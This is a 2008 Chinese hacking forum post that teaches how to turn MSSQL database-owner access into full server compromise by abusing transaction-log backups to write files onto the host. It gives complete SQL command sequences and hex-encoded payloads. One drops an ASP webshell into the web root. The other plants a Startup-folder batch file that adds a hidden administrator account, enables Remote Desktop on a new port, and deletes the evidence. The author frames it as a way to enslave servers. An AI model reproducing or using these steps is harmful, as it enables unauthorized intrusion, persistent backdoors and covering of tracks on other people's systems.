hackhd申请加入PYG----作业3(SQL DB权限超级备份)

hackhd

一般拿到SQL的DB权限总觉得没什么用，其实错了
有两种用法 前提条件是xp_dirtree 这个功能要能用
第一种
利用此工具SQL连接ASP版连接上服务器找到网站在服务器上的绝对的路径
然后用 致远SQL分析器连接上SQL
输入命令
查寻所属数据名
SELECT DB_NAME() 点运行，得到当前数据库名
然后把网站的绝对路径用啊D大哥的   啊D编码工具v1.0  MSSQL[varchar]16进制编码模式转换成16进制
然后粘贴命令
alter database [当前数据库名] set RECOVERY FULL--
create table cmd (a image)--   '创建一个表
backup log [sqlxgu64178] to disk = 'c:\cmd1' with init--
insert into cmd (a) values (0x406563686F206F66660D0A406563686F206F66660D0A780D0A780D0A780D0A6E6574207573657220783737782420776F6465626569626569202F6164640D0A6E6574206C6F63616C67726F75702061646D696E6973747261746F7273207837377824202F6164640D0A64656C202530)-- '16进制内容可以是一句话木马也可是任何你想插入的
backup log [当前数据库名] to disk = '网站路绝对路径+备份的文件名一定要是.ASP'--
drop table cmd--
然后就可以用相对应的一句话连接端连了
第二种
直接备份到开机启动文件夹里面去，让它服务器一重启就成你的肉鸡哈，哈哈，是不是很爽呢。
@echo off
@echo off
net user 001$ wodebeibei /add
net localgroup administrators 001$ /add
echo Windows Registry Editor Version 5.00>>c:\89.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>c:\89.reg
echo "fDenyTSConnections"=dword:00000000>>c:\89.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>c:\89.reg
echo "PortNumber"=dword:00000d3d>>c:\89.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>c:\89.reg
echo "PortNumber"=dword:00000d3d>>c:\89.reg
regedit /s c:\89.reg
del c:\89.reg
这段代码的功能很全了，创建了超级用户，而且如果服务器没有开3389的话，连3389也开了，将此代码用上面的工具转成16进制
如果想不留蛛丝马迹就在最后面加一句自删除的代码，运行后自删除
alter database [当前数据库名] set RECOVERY FULL--
create table cmd (a image)--
backup log [sqlxgu64178] to disk = 'c:\cmd1' with init--
insert into cmd (a) values (0x406563686F206F66660D0A406563686F206F66660D0A6E65742075736572203030312420776F6465626569626569202F6164640D0A6E6574206C6F63616C67726F75702061646D696E6973747261746F72732030303124202F6164640D0A6563686F2057696E646F777320526567697374727920456469746F722056657273696F6E20352E30303E3E633A5C38392E7265670D0A6563686F205B484B45595F4C4F43414C5F4D414348494E455C53595354454D5C43757272656E74436F6E74726F6C5365745C436F6E74726F6C5C5465726D696E616C205365727665725D3E3E633A5C38392E7265670D0A6563686F20226644656E795453436F6E6E656374696F6E73223D64776F72643A30303030303030303E3E633A5C38392E7265670D0A6563686F205B484B45595F4C4F43414C5F4D414348494E455C53595354454D5C43757272656E74436F6E74726F6C5365745C436F6E74726F6C5C5465726D696E616C205365727665725C5764735C72647077645C5464735C7463705D3E3E633A5C38392E7265670D0A6563686F2022506F72744E756D626572223D64776F72643A30303030306433643E3E633A5C38392E7265670D0A6563686F205B484B45595F4C4F43414C5F4D414348494E455C53595354454D5C43757272656E74436F6E74726F6C5365745C436F6E74726F6C5C5465726D696E616C205365727665725C57696E53746174696F6E735C5244502D5463705D3E3E633A5C38392E726567200D0A6563686F2022506F72744E756D626572223D64776F72643A30303030306433643E3E633A5C38392E7265670D0A72656765646974202F7320633A5C38392E7265670D0A64656C20633A5C38392E726567)--
backup log [当前数据库名] to disk = 'C:\Documents and Settings\Administrator\「开始」菜单\程序\启动\ok.bat'--
drop table cmd--
好了，等着收网吧!GOOD LUCK!!!!

[ 本帖最后由 hackhd 于 2008-8-30 22:24 编辑 ]